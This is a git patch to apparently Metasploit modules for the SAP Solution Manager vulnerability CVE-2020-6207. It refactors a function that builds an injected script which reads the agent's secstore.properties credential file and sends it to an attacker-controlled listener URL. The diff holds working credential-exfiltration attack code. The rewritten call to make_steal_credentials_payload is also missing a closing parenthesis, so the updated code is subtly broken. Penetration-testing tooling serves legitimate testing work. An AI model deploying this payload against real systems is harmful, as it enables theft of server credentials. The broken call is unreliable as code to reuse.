From 3f2a07bdcaddfac2ddf05c31400a749c2e88404c Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Thu, 26 Feb 2026 11:45:54 -0500
Subject: [PATCH] Update #make_steal_credentials_payload to just take url

---
 .../core/exploit/remote/http/sap_sol_man_eem_miss_auth.rb   | 4 ++--
 modules/auxiliary/admin/sap/cve_2020_6207_solman_rce.rb     | 6 ++----
 2 files changed, 4 insertions(+), 6 deletions(-)

diff --git a/lib/msf/core/exploit/remote/http/sap_sol_man_eem_miss_auth.rb b/lib/msf/core/exploit/remote/http/sap_sol_man_eem_miss_auth.rb
index 0ee2ad41c8..7c71a4d9c8 100644
--- a/lib/msf/core/exploit/remote/http/sap_sol_man_eem_miss_auth.rb
+++ b/lib/msf/core/exploit/remote/http/sap_sol_man_eem_miss_auth.rb
@@ -49,8 +49,8 @@ module Msf
     end
 
     # Make payload for steal credentials for SolMan server from agent
-    def make_steal_credentials_payload(instance, host, port, url)
-      command = "var u = new Packages.java.net.URL(\"http://#{host}:#{port}#{url}\");"
+    def make_steal_credentials_payload(instance, url)
+      command = "var u = new Packages.java.net.URL(\"#{url}\");"
       command << 'var o = Packages.java.lang.System.getProperty("os.name").toLowerCase();'
       command << 'if (o.indexOf("win") >= 0) '
       command << "{var p = Packages.java.nio.file.Paths.get(\"C:\\\\usr\\\\sap\\\\DAA\\\\#{instance}\\\\SMDAgent\\\\configuration\\\\secstore.properties\");} "
diff --git a/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce.rb b/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce.rb
index 31924b2655..abd20a5c40 100644
--- a/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce.rb
+++ b/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce.rb
@@ -58,7 +58,7 @@ class MetasploitModule < Msf::Auxiliary
         OptString.new('SSRF_METHOD', [true, 'HTTP method for SSRF', 'GET'], conditions: %w[ACTION == SSRF]),
         OptString.new('SSRF_URI', [true, 'URI for SSRF', 'http://127.0.0.1:80/'], conditions: %w[ACTION == SSRF]),
         OptString.new('COMMAND', [true, 'Command for execute in agent', 'id'], conditions: %w[ACTION == EXEC]),
-        OptAddress.new('SRVHOST', [ true, 'The local IP address to listen HTTP requests from agents', '192.168.1.1' ], conditions: %w[ACTION == SECSTORE]),
+        OptAddressRoutable.new('SRVHOST', [ false, 'The local IP address to listen HTTP requests from agents' ], conditions: %w[ACTION == SECSTORE]),
         OptPort.new('SRVPORT', [ true, 'The local port to listen HTTP requests from agents', 8000 ], conditions: %w[ACTION == SECSTORE]),
         OptString.new('AGENT', [true, 'Agent server name for exec command or SSRF', 'agent_server_name'], conditions: ['ACTION', 'in', %w[SSRF EXEC SECSTORE]]),
       ]
@@ -68,8 +68,6 @@ class MetasploitModule < Msf::Auxiliary
   def setup_xml_and_variables
     @host = datastore['RHOSTS']
     @port = datastore['RPORT']
-    @srv_host = srvhost
-    @srv_port = datastore['SRVPORT']
     @path = datastore['TARGETURI']
 
     @agent_name = datastore['AGENT']
@@ -255,7 +253,7 @@ class MetasploitModule < Msf::Auxiliary
         }
       }
     )
-    @creds_payload = make_steal_credentials_payload(agent[:instanceName], @srv_host, @srv_port, "/#{@script_name}")
+    @creds_payload = make_steal_credentials_payload(agent[:instanceName], get_uri("/#{@script_name}")
     print_status("Start script: #{@script_name} with payload for retrieving SolMan credentials file from agent: #{@agent_name}")
     send_soap_request(make_soap_body(@agent_name, @script_name, @creds_payload))